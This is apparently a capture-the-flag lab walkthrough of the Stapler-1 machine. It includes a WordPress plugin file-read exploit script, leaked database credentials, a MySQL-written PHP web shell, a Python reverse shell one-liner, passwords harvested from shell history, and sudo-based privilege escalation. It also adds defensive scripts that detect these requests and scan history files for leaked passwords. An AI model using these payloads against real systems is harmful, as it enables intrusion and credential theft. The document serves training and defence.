# Timeline
# 03/24/2016 - Bug discovered
# 03/24/2016 - Initial notification of vendor
# 04/01/2016 - No answer from vendor, public release of bug


# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

# function ave_publishPost(){
#     $title = $_REQUEST['title'];
#     $term = $_REQUEST['term'];
#     $thumb = $_REQUEST['thumb'];
#     <snip>
# Line 78:
#     $image_data = file_get_contents($thumb);


# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
for line in content:
    numbers = re.findall(r'\d+',line)
    id = numbers[-1]
    id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls=re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()

Edit the IP and directory in the PoC, save it and run it. The modified PoC script is shown below

import random
import urllib2
import re
import ssl

ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.56.122:12380/blogblog" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
for line in content:
    numbers = re.findall(r'\d+',line)
    id = numbers[-1]
    id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls=re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()

Running the PoC produced no output, but a new file 957550172.jpeg appeared under https://192.168.56.122:12380/blogblog/wp-content/uploads/. Download this file and view its contents

root@kali:~/vulnhub/stapler-1# cat 957550172.jpeg 
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

This reveals the MySQL database account and password: root/plbkac. Next, connect to the database

First, guess the site's absolute path as follows

MySQL [wordpress]> select load_file('/var/www/https/robots.txt');
+-------------------------------------------------------------+
| load_file('/var/www/https/robots.txt') |
+-------------------------------------------------------------+
| User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
|
+-------------------------------------------------------------+
1 row in set (0.001 sec)

Use the following MySQL statement to write a web shell

MySQL [wordpress]> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.001 sec)

The web shell was written successfully and can execute commands

https://192.168.56.122:12380/blogblog/wp-content/uploads/shell.php?cmd=id

Now run the following command to get a reverse shell

Run it in the browser

https://192.168.56.122:12380/blogblog/wp-content/uploads/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5566));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

On the Kali side, the shell connects back successfully

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.122: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.122] 54522
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd
/var/www/https/blogblog/wp-content/uploads
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@red:/var/www/https/blogblog/wp-content/uploads$ whoami
whoami
www-data
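As an added example (not part of the original writeup), the following Python 3 script shows the detection side of the chain above: it parses constructed combined-format access log lines and flags the ave_publishPost arbitrary file read and command execution through a PHP file under wp-content/uploads. The log format, the sample lines and the finding labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined access-log format (constructed assumption about the server's logging).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# PHP executing from the uploads directory is never legitimate on a stock WordPress.
UPLOADS_PHP_RE = re.compile(r'/wp-content/uploads/.*\.php$', re.I)

def classify_request(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith('/wp-admin/admin-ajax.php') and \
            'ave_publishPost' in qs.get('action', []):
        thumb = qs.get('thumb', [''])[0]
        # The plugin passes thumb straight to file_get_contents(): a path
        # traversal, absolute path or URL means an arbitrary file read.
        if '..' in thumb or thumb.startswith('/') or '://' in thumb:
            return 'ave_publishPost arbitrary file read: thumb=' + thumb
        return 'ave_publishPost unauthenticated post creation'
    if UPLOADS_PHP_RE.search(parts.path):
        if 'cmd' in qs:
            return 'web shell command execution: ' + qs['cmd'][0]
        return 'PHP script requested from wp-content/uploads'
    return None

def scan_log(lines):
    """Parse access-log lines; return (client ip, timestamp, label) per hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse instead of failing
        label = classify_request(m.group('target'))
        if label:
            findings.append((m.group('ip'), m.group('ts'), label))
    return findings

# Constructed sample lines mirroring the requests made in the walkthrough.
SAMPLE_LOG = [
    '192.168.56.102 - - [13/Apr/2020:22:40:01 +0800] "GET /blogblog/?p=1 HTTP/1.1" 200 5120',
    '192.168.56.102 - - [13/Apr/2020:22:40:05 +0800] "GET /blogblog/wp-admin/admin-ajax.php'
    '?action=ave_publishPost&title=957550172&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1" 200 12',
    '192.168.56.102 - - [13/Apr/2020:22:41:10 +0800] "GET /blogblog/wp-content/uploads/957550172.jpeg HTTP/1.1" 200 3100',
    '192.168.56.102 - - [13/Apr/2020:22:41:20 +0800] "GET /blogblog/wp-content/uploads/shell.php?cmd=id HTTP/1.1" 200 54',
]

if __name__ == '__main__':
    for ip, ts, label in scan_log(SAMPLE_LOG):
        print(ip, ts, label)
```

The jpeg fetch on the third sample line is deliberately not flagged; the file-read finding on the second line is what points at the uploads directory to check.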

Use the following command to try to find SSH credentials

www-data@red:/$ pwd
pwd
/
www-data@red:/$ find -name ".bash_history" -exec cat {} \; 2>/dev/null
find -name ".bash_history" -exec cat {} \; 2>/dev/null
...
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
...

Both of the following credential pairs log in successfully

JKanode    thisimypassword
peter JZQuyIN5
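Added example (not from the original writeup): the same credential leak seen from the defender's side. This audit scans shell history files for passwords passed as command-line arguments (sshpass -p, mysql -p/--password), reports the line with the secret redacted, and runs over constructed history content mirroring what the find command above returned. The pattern set and the home-directory layout are assumptions.

```python
import os
import re

# Command-line forms that put a secret into shell history (constructed set;
# extend it for other tools that accept a password argument).
PATTERNS = [
    ('sshpass', re.compile(r'\bsshpass\s+(?:.*\s)?-p\s*(?P<secret>\S+)')),
    ('mysql', re.compile(r'\bmysql\b.*\s-p(?P<secret>\S+)')),
    ('mysql', re.compile(r'\bmysql\b.*--password=(?P<secret>\S+)')),
]

def find_leaks(text):
    """Return [(line_no, tool, redacted_line)] for history lines carrying a secret."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for tool, rx in PATTERNS:
            m = rx.search(line)
            if m:
                # Report the command shape, never the secret itself.
                redacted = line[:m.start('secret')] + '<redacted>' + line[m.end('secret'):]
                hits.append((no, tool, redacted))
                break
    return hits

def audit_history_files(home_root):
    """Scan <home_root>/<user>/.bash_history and .zsh_history; return {user: hits}.
    Run as root so every file is readable; unreadable or missing files are skipped."""
    report = {}
    for user in sorted(os.listdir(home_root)):
        for name in ('.bash_history', '.zsh_history'):
            path = os.path.join(home_root, user, name)
            try:
                with open(path, errors='replace') as fh:
                    hits = find_leaks(fh.read())
            except OSError:
                continue
            if hits:
                report.setdefault(user, []).extend(hits)
    return report

# Constructed history content mirroring the lines the walkthrough recovered.
SAMPLE_HISTORY = """ls -la
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
mysql -u root -pplbkac wordpress
sshpass -p JZQuyIN5 peter@localhost
"""

if __name__ == '__main__':
    for no, tool, line in find_leaks(SAMPLE_HISTORY):
        print('line %d [%s]: %s' % (no, tool, line))
```

On a real host, `audit_history_files('/home')` gives the per-user report; a hit is a signal to rotate that password and to prefer key-based SSH or a credential prompt over a password on the command line.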
root@kali:~# ssh JKanode@192.168.56.122
The authenticity of host '192.168.56.122 (192.168.56.122)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.122' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa':
JKanode@192.168.56.122's password:
Welcome back!



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

JKanode@red:~$ id
uid=1013(JKanode) gid=1013(JKanode) groups=1013(JKanode)
JKanode@red:~$ whoami
JKanode
root@kali:~# ssh peter@192.168.56.122
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa':
peter@192.168.56.122's password:
Welcome back!

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q) Quit and do nothing. The function will be run again next time.

(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.

(1) Continue to the main menu.

(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).

--- Type one of the keys in parentheses ---
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red%
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% whoami
peter

Run the following commands to escalate privileges as user peter

red% sudo usermod -s /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for peter:
Usage: usermod [options] LOGIN

Options:
-c, --comment COMMENT new value of the GECOS field
-d, --home HOME_DIR new home directory for the user account
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
-f, --inactive INACTIVE set password inactive after expiration
to INACTIVE
-g, --gid GROUP force use GROUP as new primary group
-G, --groups GROUPS new list of supplementary GROUPS
-a, --append append the user to the supplemental GROUPS
mentioned by the -G option without removing
him/her from other groups
-h, --help display this help message and exit
-l, --login NEW_LOGIN new value of the login name
-L, --lock lock the user account
-m, --move-home move contents of the home directory to the
new location (use only with -d)
-o, --non-unique allow using duplicate (non-unique) UID
-p, --password PASSWORD use encrypted password for the new password
-R, --root CHROOT_DIR directory to chroot into
-s, --shell SHELL new login shell for the user account
-u, --uid UID new UID for the user account
-U, --unlock unlock the user account
-v, --add-subuids FIRST-LAST add range of subordinate uids
-V, --del-subuids FIRST-LAST remove range of subordinate uids
-w, --add-subgids FIRST-LAST add range of subordinate gids
-W, --del-subgids FIRST-LAST remove range of subordinate gids
-Z, --selinux-user SEUSER new SELinux user mapping for the user account

red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% whoami
peter
red% sudo -i
➜ ~ id
uid=0(root) gid=0(root) groups=0(root)
➜ ~ whoami
root
➜ ~ cd /root
➜ ~ ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Successfully obtained root privileges and got the flag

Other methods

Alternatively, after getting into the WordPress database, select the user john and crack the hash; it comes out as "incorrect". Log into WordPress with user "john" and password "incorrect", navigate to add a plugin, upload a shell, and the shell will be found in the /blogblog/wp-content/uploads directory

After establishing the connection with nc as the listener, the following methods can also be used to escalate privileges

  • Privilege escalation reference 1: Linux - UAF via double-fdput in bpf(BPF_PROG_LOAD) error path

  • Privilege escalation reference 2: Linux kernel 4.4.x (Ubuntu 16.04) - double-fdput bpf(BPF_PROG_LOAD) privilege escalation

Try other methods on your own...

Summary of key points

  • WordPress user enumeration
  • WordPress Plugin Advanced Video 1.0 - Local File Inclusion
  • Modifying the Python PoC
  • select load_file('/var/www/https/robots.txt'); reading file contents with a MySQL statement
  • select "php web shell contents" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php"; writing a web shell with a MySQL statement
  • Python one-liner reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5566));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Using find to look for SSH passwords in shell history
find -name ".bash_history" -exec cat {} \; 2>/dev/null
  • sudo -i privilege escalation
sudo usermod -s /bin/bash
sudo -i
  • Linux kernel 4.4.x (Ubuntu 16.04) - double-fdput bpf(BPF_PROG_LOAD) privilege escalation

Game over

Sorry, this time I still didn't find that Greek guru's foolproof one-click clear script. I am so sorry about this... It's a pity...

The end, to be continued...